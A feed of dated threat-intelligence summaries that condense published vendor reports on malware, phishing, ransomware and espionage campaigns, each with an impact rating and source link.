Intel Name:: 10K_WordPressSites_Delivering_Malware

Date of Scan:: 2025-02-08

Impact:: MEDIUM

Summary:: Over 10,000 WordPress websites have been compromised to deliver malware targeting both macOS and Windows users. Attackers inject a malicious JavaScript file into outdated WordPress sites, generating fake Google browser update pages via an iframe. This campaign delivers AMOS (Atomic macOS Stealer) for Apple users and SocGholish for Windows users—malware previously thought to be distributed by separate groups. The infection spreads through vulnerable WordPress plugins, making detection difficult.

Source: https://cside.dev/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware

Intel Source:: Genians

Intel Name:: APT_37_Targeting_K_Messenger

Date of Scan:: 2025-02-08

Impact:: LOW

Summary:: Researchers from Genians have uncovered where APT 37 known as ScarCruft or Reaper targeting group chat platform called K messenger to spread malicious LNK files. These files are hidden inside ZIP archives and given deceptive names such as Changes in Chinese Government’s North Korea Policy.zip to trick victims into opening them. Once the victim clicks on the LNK file, it silently executes a hidden PowerShell command that triggers a series of infections. This eventually installs the RokRAT malware that can steal data, take screenshots and run commands on the compromised system.

Source: https://www.genians.co.kr/blog/threat_intelligence/k-messenger

Intel Source:: Intezer

Intel Name:: XE_Group_Exploits_VeraCore_Flaws

Date of Scan:: 2025-02-08

Impact:: LOW

Summary:: Researchers at Intezer have found that XE Group, a sophisticated cybercrime group operating since 2013, has shifted its techniques from credit card skimming to targeted information theft. Their most recent actions involve exploiting two zero-day vulnerabilities in VeraCore software (CVE-2024-57968, CVSS 9.9, and CVE-2025-25181, CVSS 5.8) to build webshells and keep persistent access to affected computers.

Source: https://intezer.com/blog/research/xe-group-exploiting-zero-days/

Intel Source:: SentinelLabs

Intel Name:: MacOS_Flexible_Ferret

Date of Scan:: 2025-02-08

Impact:: MEDIUM

Summary:: Researchers from Sentinel Labs have identified a new malware called FlexibleFerret targeting macOS users while evading Apple’s detection tool XProtect. This malware linked to North Korean cyber campaign called Contagious interview where attackers use deceptive tactics to lure job seekers into installing malicious software such as VCam or Camera Access. FlexibleFerret is delivered through a malicious Apple Installer package which contains critical components that work together to execute the malware which allow the attackers to steal information or gain control over the infected macOS systems.

Source: https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/

Intel Source:: Malwarebytes

Intel Name:: Fake_Cisco_Ad_Spreads_NetSupport_RAT

Date of Scan:: 2025-02-08

Impact:: LOW

Summary:: Researchers at Malwarebytes have found a malicious campaign that used Google ads to spread a fake Cisco AnyConnect installer containing the NetSupport RAT. Threat actors copied a German university's website, not to deceive people directly, but to avoid ad detection systems. Users who searched for Cisco AnyConnect were routed to a fake Cisco copycat website that hosted the malware.

Source: https://www.malwarebytes.com/blog/news/2025/02/university-site-cloned-to-evade-ad-detection-distributes-fake-cisco-installer

Intel Source:: Hunt.IO

Intel Name:: Attackers_Targeting_Govt_and_Education_Entities

Date of Scan:: 2025-02-07

Impact:: LOW

Summary:: Researchers from Hunt.IO identified a threat group named GreenSpot that has been active since 2007. The group is believed to be operating from Taiwan and primarily targets government, academic and military-related organisations in China. They use phishing tactics where they create fake websites that resemble legitimate email services like Netease Mail to trick users into entering their credentials. When users enter their credential on these fake sites, attackers steal their login details and gains access to their accounts without permission.

Source: https://hunt.io/blog/greenspot-apt-targets-163com-fake-downloads-spoofing

Intel Source:: JScrambler

Intel Name:: StealingSeconds_WebsiteSkimmers

Date of Scan:: 2025-02-07

Impact:: MEDIUM

Summary:: A recent investigation uncovered a web skimming attack affecting multiple websites, including Casio UK’s online store. The attack, exploiting vulnerabilities in Magento-based web stores, involved a two-stage skimmer that harvested sensitive customer data through an elaborate fake checkout process. Unlike typical skimmers that target only checkout pages, this one operated on all pages except the final checkout step, capturing personal and payment details before redirecting users to the legitimate page. The stolen data was encrypted and sent to a Russian-hosted server, suggesting an organized cybercriminal operation. Casio UK had a Content Security Policy (CSP) in place, but its ineffective configuration failed to prevent the attack.

Source: https://jscrambler.com/blog/stealing-seconds-web-skimmer-compromises-websites

Intel Source:: Cyfirma

Intel Name:: FLESH_STEALER

Date of Scan:: 2025-02-07

Impact:: LOW

Summary:: Cyfirma researchers have uncovered a Flesh Stealer which is designed to steal sensitive information from compromised system. It is developed by Russian-speaking individual and includes various features such as anti-debugging and anti-VM capabilities. This malware first appeared in August 2024 and has been promoted on multiple platforms like Discord, Telegram and underground forum like Pyrex Guru. Flesh Stealer primarily targets popular web browsers such as Chrome, Firefox, Opera, and Edge to steal stored credentials, cookies, and browsing history.

Source: https://www.cyfirma.com/research/flesh-stealer-unmasking-the-blue-masked-thief/

Intel Source:: Cyble

Intel Name:: Stealthy_Malware_Bypasses_Chrome_Encryption

Date of Scan:: 2025-02-07

Impact:: LOW

Summary:: Researchers from Cyble have found sneaky malware that can overcome Chrome's App-Bound Encryption via dual injection tactics. The malware is deployed as a ZIP archive containing an.An LNK file disguised as a PDF and an XML project file disguised as a PNG are aimed toward Vietnamese enterprises, notably those in the Telemarketing or Sales sectors.

Source: https://cyble.com/blog/dual-injection-undermines-chromes-encryption/

Intel Source:: Malwarebytes

Intel Name:: ClickFix_Tactics_in_DarkGate_Campaigns

Date of Scan:: 2025-02-07

Impact:: LOW

Summary:: Researchers at Malwarebytes have discovered a new DarkGate malvertising operation that uses both the "ClickFix" approach and standard file downloads. ClickFix uses bogus CAPTCHA or traffic validation sites to entice visitors to paste and execute code, whereas previous techniques rely on malware-laden installers. This operation, which targets the Notion brand using malicious Google advertisements, indicates that threat actors are likely watching conversion metrics to see which strategy results in more effective malware infections.

Source: http://malwarebytes.com/blog/news/2025/01/clickfix-vs-traditional-download-in-new-darkgate-campaign

Intel Source:: ASEC

Intel Name:: KimsukyGroup_Using_RDP_Wrapper

Date of Scan:: 2025-02-07

Impact:: MEDIUM

Summary:: The Kimsuky cyber threat group continues to conduct spear-phishing attacks, distributing malware disguised as document files to gain control of targeted systems. Their attacks leverage malicious shortcut files (*.LNK) that execute PowerShell commands to install malware such as the PebbleDash backdoor and a custom RDP Wrapper, which enables remote access. The group also employs proxy tools to bypass network restrictions, keyloggers to capture user inputs, and information-stealing malware that extracts credentials from web browsers. Recent attacks indicate a shift towards remote control tools rather than backdoors.

Source: https://asec.ahnlab.com/en/86098/

Intel Source:: Reversing Labs

Intel Name:: Hugging_Face_Malware_Threat

Date of Scan:: 2025-02-07

Impact:: LOW

Summary:: Researchers at ReversingLabs have found a unique approach used by threat actors to transmit malware via the Hugging Face platform by exploiting Pickle file serialization. Pickle, a popular Python package for serializing ML model data, is sensitive since it permits arbitrary code execution during deserialization. Despite previous warnings and information highlighting these concerns, it is still popular due to its ease of use.

Source: https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face

Intel Source:: Sygnia

Intel Name:: Abyss_Locker_Ransomware

Date of Scan:: 2025-02-07

Impact:: MEDIUM

Summary:: Sygnia researchers have identified a new ransomware group dubbed Abyss Locker that emerged in 2023 and continued its attack in 2024 leveraging ransomware to cripple victims. The group target critical infrastructure such as VPN appliances, network-attached storage (NAS) devices, and ESXi servers of an organisations to establish their footholds within the victim’s network. This group begins their attack by exploiting vulnerabilities in unpatched VPN appliances to gain initial access. They are exploiting a known vulnerability (CVE-2021-20038) in a SonicWall VPN device. After compromising the devices and network, they effectively deploy ransomware to encrypt the data.

Source: https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/

Intel Source:: Fortiguard Labs

Intel Name:: ReverseEngineering_of_ELF_SshdinjectorAtr

Date of Scan:: 2025-02-06

Impact:: MEDIUM

Summary:: FortiGuard Labs analyzed ELF/Sshdinjector.A!tr, a Linux-based malware targeting network appliances and IoT devices for data exfiltration. Linked to the DaggerFly espionage group and the Lunar Peek campaign, the malware injects itself into the SSH daemon, maintaining persistence through infected binaries and communicating with a remote command-and-control (C2) server. Researchers reverse-engineered its components using Radare2 and AI-assisted analysis via r2ai. While AI provided efficient summaries and readable source code, it also introduced errors such as hallucinations, exaggerations, and omissions, underscoring the need for human oversight.

Source: https://www.fortinet.com/blog/threat-research/analyzing-elf-sshdinjector-with-a-human-and-artificial-analyst

Intel Source:: Unit 42

Intel Name:: NetflixThemed_Survey_Phishing_Campaign

Date of Scan:: 2025-02-06

Impact:: MEDIUM

Summary:: Unit 42 identified a recent phishing campaign is exploiting fake Netflix-themed surveys to steal credit card information. The scam lures users into completing a survey, which then redirects them to a fraudulent payment page requesting credit card details. If users provide their information, they are sent to a fake "winner" page, while those who ignore the survey are redirected to another scam site after two minutes. The domain has shown increased activity in December 2024 and January 2025, likely tied to this phishing operation.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-02-03-IOCs-for-Netflix-themed-survey-phishing-campaign.txt

Intel Source:: Morphisec Labs

Intel Name:: ValleyRAT_Targets_Financial_Organizations

Date of Scan:: 2025-02-06

Impact:: LOW

Summary:: Morphisec Labs researchers discovered a malware campaign using malware called ValleyRAT linked to Silver Fox APT Group. This campaign specifically targets finance and accounting departments of an organisations. The attackers employ phishing websites to distribute malware. One site is https[://]anizom[.]com/ to lure users into downloading a fake chrome browser while another impersonates Chinese telecom company called Karlos and delivers malicious files. When users extract and run these files, it requests for privilege access to gain administrative system access.

Source: https://www.morphisec.com/blog/rat-race-valleyrat-malware-china/?utm_content=323764605&utm_medium=social&utm_source=twitter&hss_channel=tw-2965779277

Intel Source:: ForcePoint

Intel Name:: AsyncRAT_Abusing_Python_and_TryCloudflare

Date of Scan:: 2025-02-04

Impact:: LOW

Summary:: Forcepoint Labs have uncovered a new AsyncRAT malware campaign abusing TryCloudflare and malicious Python Packages. The attacker leverage phishing emails which contain a Dropbox link that downloads a ZIP file with .URL extension. This .url file extension redirect to an .lnk file which then executes JavaScript that downloads AsyncRAT malware, giving attackers full control over the compromised system.

Source: https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware

Intel Source:: SentinelOne

Intel Name:: High_Profile_Account_Targeting_on_Twitter

Date of Scan:: 2025-02-03

Impact:: LOW

Summary:: Researcher from Sentinel labs have uncovered a phishing campaign targeting Twitter account holders to hijack them for fraudulent activities. The attackers are targeting U.S. political figures, International journalists, X employees, cryptocurrency organizations and other platforms to steal money from unsuspecting victims. Their main focus is on high-profile accounts on twitter. In this campaign, they use two different tactics to deceive users. The first is fake account logins via emails and second is copyright violation warnings to trick users into clicking malicious links. Once they take over the account, they immediately lock the account and start posting fraudulent cryptocurrency investment opportunities for financial gains.

Source: https://www.sentinelone.com/labs/phishing-on-x-high-profile-account-targeting-campaign-returns/

Intel Source:: SecurityScorecard

Intel Name:: Operation_Phantom_Circuit

Date of Scan:: 2025-02-03

Impact:: MEDIUM

Summary:: In December 2024, the North Korea-linked Lazarus Group launched "Operation Phantom Circuit," a sophisticated cyberattack targeting cryptocurrency and technology developers worldwide. By embedding malware into trusted development tools, the group compromised over 1,500 systems across multiple attack waves. STRIKE’s investigation revealed an elaborate infrastructure involving proxy servers in Hasan, Russia, command-and-control servers, and persistent remote access sessions to exfiltrate sensitive data. Attackers employed VPNs and commercial proxy networks to obfuscate their origins, routing traffic through Russian-based Oculus Proxy nodes before reaching their command centers. The stolen data—including credentials, authentication tokens, and system configurations—was ultimately stored on Dropbox.

Source: https://securityscorecard.com/blog/operation-phantom-circuit-north-koreas-global-data-exfiltration-campaign/

Intel Source:: Akamai

Intel Name:: New_Aquabotv3_Malware_Targets_Mitel_SIP_Phones

Date of Scan:: 2025-02-02

Impact:: LOW

Summary:: Akamai researchers have discovered a new variant of the Mirai-based malware Aquabotv3. This variant targets Mitel SIP phones by exploiting CVE-2024-41710, a command injection vulnerability. This new version introduces a unique function, report_kill, which notifies the command and control (C2) server when a kill signal is detected on the infected device. As of the latest update, no response has been observed from C2.

Source: https://www.akamai.com/blog/security-research/2025-january-new-aquabot-mirai-variant-exploiting-mitel-phones

Intel Source:: Cyfirma

Intel Name:: Windows_Locker_Ransomware_Insight

Date of Scan:: 2025-02-02

Impact:: LOW

Summary:: Researchers at CYFIRMA have discovered a new ransomware called "Windows Locker," which targets victims by encrypting their files and appending the.winlocker extension. When infected, it leaves a ransom note called Readme.txt, which instructs you to contact the attacker or an authorized administrator for payment and decryption. This malware, written in.NET, originally appeared in December 2024 and has since been widely distributed via GitHub.

Source: https://www.cyfirma.com/research/windows-locker-ransomware/

Intel Source:: Proofpoint

Intel Name:: Malicious_Domains_Impersonate_Tax_Agencies

Date of Scan:: 2025-02-02

Impact:: LOW

Summary:: Researchers at Proofpoint have detected a rise in scams and malicious websites mimicking tax agencies and financial companies, coinciding with tax season in the United Kingdom and the United States. Attackers have used tax-related topics to spoof government agencies and financial institutions, attempting to trick users into engaging with fake information.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account

Intel Source:: Palo Alto

Intel Name:: CL_STA_0048_Targeting_South_Asia

Date of Scan:: 2025-02-02

Impact:: LOW

Summary:: Researchers at Palo Alto Networks have discovered an espionage effort known as CL-STA-0048 that targeted high-value entities in South Asia, including a telecommunications corporation. The attackers used uncommon approaches such as Hex Staging for payload delivery, DNS exfiltration via ping, and SQLcmd misuse for data theft. Based on the methods, tools, infrastructure, and victimology, the activity is believed to originate in China with moderate-high confidence.

Source: https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/

Intel Source:: Trend Micro

Intel Name:: Lumma_Stealer_GitHub_Based_Delivery

Date of Scan:: 2025-02-02

Impact:: LOW

Summary:: Trend Micro researchers have discovered a sophisticated campaign distributing Lumma Stealer malware via GitHub's release infrastructure. The attackers exploited GitHub as a trusted platform to deliver the malware, which then deployed additional threats like SectopRAT, Vidar, Cobeacon, and another Lumma Stealer variant. The campaign shows ties to the Stargazer Goblin group, known for using compromised websites and GitHub repositories to distribute malicious payloads, highlighting the group's evolving tactics.

Source: https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html

Intel Source:: ESentire

Intel Name:: Email_Bombing_Campaign

Date of Scan:: 2025-02-01

Impact:: LOW

Summary:: Esentire researchers have identified a campaign where attackers are using the Email Bombing tactic to compromise organisation. In this campaign, recipients receive a massive flood of spam emails and after that they get a message on MS teams from fake IT support team that takes advantage of MS Teams settings. Fake IT team claims they can fix the issue and request a remote session. Once the victim agrees to the session, the attackers gain control of the system and sliently install malware that allow them to stay in the system to steal credentials, exfiltrate sensitive data and potentially deploy ransomware.

Source: https://www.esentire.com/security-advisories/ongoing-email-bombing-campaigns-leading-to-remote-access-and-post-exploitation

Intel Source:: knownsec 404

Intel Name:: GamaCopy_Targets_Russian_Entities

Date of Scan:: 2025-02-01

Impact:: MEDIUM

Summary:: Researchers from the Knownsec 404 Advanced Threat Intelligence team have discovered a threat actor known as "GamaCopy," who is copying the tactics of the Russian-linked Gamaredon gang to conduct attacks against Russian-speaking targets. Using military-related content as bait, the attackers use 7z self-extracting programs to deliver payloads and then use open-source tools like UltraVNC for further action.

Source: https://paper.seebug.org/3270/

Intel Source:: Threatdown

Intel Name:: Clipboard_Hijacker_Delivers_Lumma_Stealer

Date of Scan:: 2025-02-01

Impact:: LOW

Summary:: Researchers from Threatdown have observed that cybercriminals are leveraging clipboard hijacking and fake CAPCHAs to trick users into executing malicious commands. The attackers are creating fake CAPCHA on fraudulent websites including fake online store, news sites and platforms offering music and movies. They are delivering Lumma stealer malware using malicious command copied to the clipboard which relies on the MSHTA tool to download and run a PowerShell script hidden in an image file called Nusku.jpeg.

Source: https://www.threatdown.com/blog/more-cybercriminals-are-using-the-clipboard-hijacker-method/

Intel Source:: SentinelOne

Intel Name:: HellCat_and_Morpheus_RaaS_Operators

Date of Scan:: 2025-02-01

Impact:: MEDIUM

Summary:: Sentinel reseachers have observed the rise of two prominent RaaS operations called HellCat and Morpheus. These operations allow their affiliates to use pre-built ransomware tool in exchange of some share of profits. HellCat first appeared in mid-2024 and aim to establish strong position in cybercrime arena. It is operated by member of BreachForums community such as Rey, Pryx, Grep and IntelBroker which primarily targets government entities. On the other hand, Morpheus has launched its data leak site in Dec-24 and operates as semi-private RaaS. They target on pharmaceuticals and manufacturing sector with particular focus on exploiting VMware ESXi environments.

Source: https://www.sentinelone.com/blog/hellcat-and-morpheus-two-brands-one-payload-as-ransomware-affiliates-drop-identical-code/

Intel Source:: Esentire

Intel Name:: Exploitation_of_CVE_2019_18935_in_IIS

Date of Scan:: 2025-01-31

Impact:: MEDIUM

Summary:: Researchers at eSentire have found threat actors who are abusing CVE-2019-18935, a six-year-old vulnerability in Progress Telerik UI for ASP.NET AJAX. In early January 2025, eSentire's Threat Response Unit discovered attackers utilizing the IIS worker process (w3wp.exe) to load a reverse shell and run reconnaissance commands via cmd.exe. Before gaining remote access, the attackers analyzed IIS logs for a weak file upload handler and used a tailored proof-of-concept (PoC) exploit.

Source: https://www.esentire.com/blog/threat-actors-use-cve-2019-18935-to-deliver-reverse-shells-and-juicypotatong-privilege-escalation-tool

Intel Source:: Cyble

Intel Name:: DeepSeek_Crypo_Phishing_Scams

Date of Scan:: 2025-01-31

Impact:: LOW

Summary:: Cyble researchers have uncovered a new campaign related to multiple fraudulent websites impersonating DeepSeek which are part of cryptocurrency phishing schemes and investment scams. DeepSeek is Chinese AI company that recently launched its chat bot DeepSeek – AI Assistant. The attackers are taking advantage and creating deceptive websites that closely mimic the legitimate DeepSeek platform to lure users into scanning QR code to connect their cryptocurrency wallets such as MetaMask or WalletConnect. When user scans the QR code, their wallet credentials are stolen, leading to complete loss of their funds.

Source: https://cyble.com/blog/deepseeks-growing-influence-sparks-a-surge-in-frauds-and-phishing-attacks/

Intel Source:: cloudsek

Intel Name:: Phishing_Attacks_Exploit_Cloudflare

Date of Scan:: 2025-01-31

Impact:: LOW

Summary:: Researchers from the CloudSEK Threat Research Team have found an efficient phishing page that can impersonate any brand while stealing user credentials via a generic login interface. The phishing site, hosted on Cloudflare's workers.dev, effectively customizes incidents by attaching employee email addresses to their URLs, allowing for targeted campaigns. To trick victims, the site takes a screenshot of the domain connected with the target's email address (via thum.io) and displays it as the background.

Source: https://www.cloudsek.com/blog/unmasking-cyber-deception-the-rise-of-generic-phishing-pages-targeting-multiple-brands

Intel Source:: Fortinet

Intel Name:: Coyote_Banking_Trojan

Date of Scan:: 2025-01-31

Impact:: LOW

Summary:: Researchers from Fortinet have identified several malicious LNK files that use PowerShell commands to executes malicious scripts and connect to remote servers to deliver Coyote Banking Trojan to infect victims. This trojan mainly target Brazil and its goal is to steal sensitive information over 70 financial applications and numerous websites. Once deployed on a victim’s system, it performs multiple malicious activities such as keylogging, taking screenshots and displaying fake login pages to lure users into entering their banking credentials which helps cybercriminals to gain access of users banking accounts and steal financial data.

Source: https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files

Intel Source:: Bitdefender

Intel Name:: UAC_0063_Cyber_Espionage_Unveiled

Date of Scan:: 2025-01-31

Impact:: LOW

Summary:: Researchers at Bitdefender have discovered a sophisticated cyber-espionage operation by UAC-0063, a threat group that is spreading its activities from Central Asia to European countries. This actor initially targeted government entities and diplomatic missions in Central Asia, but has now expanded its scope to include embassies in Germany, the United Kingdom, the Netherlands, Romania, and Georgia.

Source: https://www.bitdefender.com/en-us/blog/businessinsights/uac-0063-cyber-espionage-operation-expanding-from-central-asia

Intel Source:: Morphisec

Intel Name:: Fake_CAPTCHA_Scam_Targets_Crypto_Users

Date of Scan:: 2025-01-31

Impact:: LOW

Summary:: Researchers from Morphisec have discovered a new operation in which fraudsters exploit false CAPTCHA verification systems to send malware to cryptocurrency groups. The attack begins on the X platform (previously Twitter), where threat actors hijack legitimate threads to trick users into joining Telegram groups. Once entered, victims are encouraged to pass a CAPTCHA with a bot that looks like "Safeguard," which results in the distribution of Lumma Stealer malware via loaders such as IDAT Loader and Emmenthal Loader.

Source: https://www.morphisec.com/blog/captcha-chaos-lumma-stealer/

Intel Source:: ISC.SANS

Intel Name:: From_PowerShell_to_a_Python_Obfuscation_Race

Date of Scan:: 2025-01-31

Impact:: LOW

Summary:: The malware uses PowerShell to download a fake document and set up a Python environment. It then deploys an InfoStealer that targets cryptocurrency wallet extensions in browsers, exfiltrating data via Telegram bots. The malware is heavily obfuscated with multiple layers of encoding and encryption to evade detection. Key indicators include malicious PowerShell scripts, Python environment setup, and cryptocurrency theft via clipboard hijacking and wallet address replacement.

Source: https://isc.sans.edu/diary/From+PowerShell+to+a+Python+Obfuscation+Race/31634/

Intel Source:: Hunt.IO

Intel Name:: SparkRAT_Malware_Target_Multiple_Operating_Systems

Date of Scan:: 2025-01-30

Impact:: LOW

Summary:: Researchers from Hunt.IO have uncovered a SparkRAT that has been active on Github since 2022. It is written in Go programming language and uses the WebSocket protocol to communicate with its C2 servers. This malware is popular among cybercriminals because of its flexible design, user friendly interface and multi-platform support for Windows, MacOS and Linux systems. It has multiple capabilities such as control files and programs, run system commands, steal sensitive data, take screenshots and even shut down and restart a system.

Source: https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections

Intel Source:: Mandiant

Intel Name:: Unmasking_the_Shadow_of_PoisonPlug

Date of Scan:: 2025-01-30

Impact:: MEDIUM

Summary:: Google/Manidant researcher have uncovered Chinese cyber-espionage operations targeting entities in Europe and the Asia-Pacific (APAC)region. These operations leverage a backdoor called POISONPLUG with a special variant POISONPLUG.SHADOW. The POISONPLUG is used by Chinese threat actor but POISONPLUG.SHADOW seems to be linked with APT41. This malware uses an advanced tool called ScatterBrain which is hard to detect and analyze. It works in three different modes: Selective, Complete and Complete headerless, each offering a different level of obfuscation. The Selective mode is used for early stages of an attack such as dropper while the other modes are used for more advanced parts of the attack like the final backdoor payload.

Source: https://cloud.google.com/blog/topics/threat-intelligence/scatterbrain-unmasking-poisonplug-obfuscator/

Intel Source:: Proofpoint

Intel Name:: Exploitation_of_HTTP_Clients_in_ATO_Attacks

Date of Scan:: 2025-01-30

Impact:: MEDIUM

Summary:: Proofpoint findings reveal that 78% of Microsoft 365 tenants were targeted by account takeover attempts using distinct HTTP clients. While most attacks rely on brute force methods with low success rates, a campaign using the Axios client had a 43% success rate in compromising accounts. Researchers also identified a high-velocity brute force campaign using the Node Fetch client. Attackers are increasingly repurposing legitimate HTTP client tools, often sourced from public repositories, to carry out attacks like Adversary-in-the-Middle (AitM) and brute force techniques, leading to increased account takeover incidents.

Source: https://www.proofpoint.com/us/blog/threat-insight/http-client-tools-exploitation-account-takeover-attacks

Intel Source:: Palo Alto

Intel Name:: New_Phishing_Campaign_Impersonating_Amazon

Date of Scan:: 2025-01-30

Impact:: LOW

Summary:: PaloAlto researchers have identified campaign in which attackers are targeting Amazon prime members to steal their credit card details. The attackers send emails with malicious PDF attachments that appear legitimate. These PDFs contain links which redirect the users through a series of URLs before going to fake Amazon official page. This deceive site is designed to trick users into entering their credit card information which is then stolen by the attackers.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-24-IOCs-for-phishing-campaign-impersonating-amazon.txt

Intel Source:: Cyfirma

Intel Name:: Astral_Stealer

Date of Scan:: 2025-01-30

Impact:: LOW

Summary:: Researchers from Cyfirma have identified an Astral stealer which is designed to steal sensitive information and maintain persistence on infected systems. It is written in python, C# and Java and has multiple functions such as credential dumping, browser injection and data exfiltration through webhooks. It is available on Github where attackers can use its built-in features. This stealer also offers some paid features such as tracking backup codes, automatically changing email addresses, capturing new credit cards and passwords and other targeted platforms.

Source: https://www.cyfirma.com/research/astral-stealer-analysis/

Intel Source:: Group-IB

Intel Name:: Lynx_The_Ransomware_as_a_Service_Group

Date of Scan:: 2025-01-30

Impact:: MEDIUM

Summary:: Researchers at Group-IB have discovered a new RaaS group called Lynx that provide advanced tools and structured platform to its affiliates to lunch the ransomware attacks. The affiliate panel is user-friendly and divided into multiple sections such as News, Companies, Chats, Stuffers and Leaks. these allow them to manage victim profiles, customize ransomware payloads and schedule data leaks from a single interface. The group provides a ransomware tookit called All-in-One Archive which work across various system like window, Linux and ESXi to ensures they can target different IT environment. They use double extortion tactics and allow affiliates to customize encryption settings based on attack requirements.

Source: https://www.group-ib.com/blog/cat-s-out-of-the-bag-lynx-ransomware/

Intel Source:: Any.Run

Intel Name:: SystemBC_RAT_Targeting_Linus_Based_Platforms

Date of Scan:: 2025-01-29

Impact:: LOW

Summary:: Any.Run researchers have uncovered a SystemBC RAT targeting Linux-based platforms. The RAT is used to create proxy implants inside victim’s networks and target internal corporate services such as company network, cloud servers and IoT devices. A proxy implant allows attackers to move around the network without being noticed. It uses encrypted communication channel with its C2 servers to ensure the implant stays connected to the attacker’s network even across different system like Window and Linux.

Source: https://x.com/anyrun_app/status/1884207667058463188

Intel Source:: Cofense

Intel Name:: SapphireRAT_Targeting_Latin_American

Date of Scan:: 2025-01-29

Impact:: LOW

Summary:: Cofense researcher have uncovered a series of attacks that leverage fake legal documents like judicial receipts to distribute and run Sapphire RAT. They hide the malware in deceive legal documents and trick the recipient into the opening and running it. When the victim opens the document and runs the file, the malware activates and gives the attacker control of victim’s system so that they can steal important data or disrupt key operations. These attacks mainly target organisation in Latin America where attackers are targeting valuable data and critical infrastructure.

Source: https://cofense.com/blog/malware-alert-fake-judicial-review-emails-deliver-sapphirerat-targeting-latin-american-victims

Intel Source:: Cybereason

Intel Name:: Phorpiex_Botnet_Delivers_LockBit_Ransomware

Date of Scan:: 2025-01-29

Impact:: MEDIUM

Summary:: Cybereason researchers have identified an infamous botnet called Phorpiex also known as Trik that has been active since 2010 and is known for spam campaigns, cryptocurrency mining and post-exploitation malware. The attackers leverage the Phorpiex botnet to deliver Lockbit Black ransomware (aka Lockbit 3.0) because this variant download and executes the ransomware automatically. The botnet primarily distributes through phishing emails which contain attachment such as Microsoft Word documents, PDFs or executables. The botnet operators offer this as a Botnet-as-a-service to other cybercriminals, allowing them to distribute ransomware like LockBit efficiently.

Source: https://www.cybereason.com/blog/threat-analysis-phorpiex-downloader

Intel Source:: Cofense

Intel Name:: Attackers_Exploit_Government_Website

Date of Scan:: 2025-01-29

Impact:: LOW

Summary:: Confense researchers have uncovered that threat actors have been exploiting .gov domains from various countries for phishing attack over past two years. They use these domains to host phishing pages, redirect users to malicious websites or act as C2 server for malware. Most of the compromised .gov domains linked to CVE-2024-25608, a vulnerability in the Liferay digital platform widely used by government organizations which allow attacker to redirect user from legitimate website to phishing sites. Brazil and the U.S are most affected countries by this phishing attack.

Source: https://cofense.com/blog/threat-actors-exploit-government-website-vulnerabilities-for-phishing-campaigns

Intel Source:: Palo Alto

Intel Name:: Phishing_Pages_Targeting_Online_Shoppers

Date of Scan:: 2025-01-28

Impact:: LOW

Summary:: Researchers at PaloAlto uncovered a campaign where attackers target victims by impersonating well known online shopping websites. These fake sites leverage the same template and design to appear legitimate. This campaign started in Nov. 2024 which entice users to enter their phone number and password on counterfeit login page. Once user enter their credentials, the message shows “This account does not exist”. However, the credentials are sent to attacker’s server instead of being validated.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-24-IOCs-for-phishing-pages-targeting-online-shoppers.txt

Intel Source:: Any.Run

Intel Name:: Ransomware_Groups_Targeting_Healthcare_Sector

Date of Scan:: 2025-01-28

Impact:: MEDIUM

Summary:: Any.Run researchers have observed that many ransomware groups are targeting healthcare sector because it is underfunded and has vulnerable infrastructure which make them easy and profitable targets. The attackers encrypt health data and demand ransomware. Moreover, many healthcare systems can afford the downtimes because it impacts patient care. Interlock is one of the prominent ransomware groups has been targeting healthcare sector with double extortion tactics. In 2024, it has targeted multiple healthcare facilities in the United states to disrupting operations and exfiltrating patient information.

Source: https://any.run/cybersecurity-blog/interlock-ransomware-attack-analysis/

Intel Source:: Esentire

Intel Name:: Lumma_Stealer_Malware_Update

Date of Scan:: 2025-01-27

Impact:: LOW

Summary:: Esentire researchers have observed that the developers of Lumma Stealer now use the ChaCha20 cipher to decrypt its configuration files. Lumma Stealer also known as LummaC2 Stealer which steals sensitive information and operated as a MaaS. This malware is often distributed through Clickfix initial method where victims are tricked into executing malicious commands.

Source: https://www.esentire.com/blog/lumma-stealer-malware-updated-to-use-chacha20-cipher-for-config-decryption

Intel Source:: Imperva

Intel Name:: Clop_Exploits_Cleo_Vulnerabilities

Date of Scan:: 2025-01-23

Impact:: LOW

Summary:: Researchers at Imperva have discovered the Clop ransomware group leveraging critical vulnerabilities (CVE-2024-50623 and CVE-2024-55956) in Cleo software used for secure file sharing. These weaknesses enable attackers to run remote code and import illegal commands, resulting in data exfiltration and malicious payload execution. Imperva has tracked over 1 million exploitation attempts against almost 10,000 sites, with a primary focus on the United States and Australia, affecting areas such as finance and the government.

Source: https://www.imperva.com/blog/imperva-protects-against-the-exploited-cves-in-the-cleo-data-theft-attacks/

Intel Source:: Microsoft

Intel Name:: Secret_Blizzard_Part2

Date of Scan:: 2025-01-23

Impact:: LOW

Summary:: Microsoft Threat Intelligence has reported that the Russian nation-state actor known as Secret Blizzard has been exploiting the tools and infrastructure of other cybercriminal groups to target Ukrainian military devices. Between March and April 2024, Secret Blizzard used the Amadey bot malware, associated with the cybercriminal group Storm-1919, to deploy its custom backdoors, including Tavdig and KazuarV2, on select Ukrainian military systems. This marks the second time since 2022 that Secret Blizzard has leveraged cybercrime infrastructure to gain access to its targets. Additionally, Secret Blizzard has co-opted tools from another Russian threat actor, Storm-1837, which focuses on Ukrainian military drone operators, to further infiltrate and compromise devices. These activities reflect a strategic approach by Secret Blizzard to diversify its attack vectors, including spear phishing, web compromises, and adversary-in-the-middle campaigns, while focusing on long-term espionage, particularly against defense-related sectors.

Source: https://www.microsoft.com/en-us/security/blog/2024/12/11/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine/

Intel Source:: Any.Run

Intel Name:: InvisibleFerret_Malware

Date of Scan:: 2025-01-22

Impact:: LOW

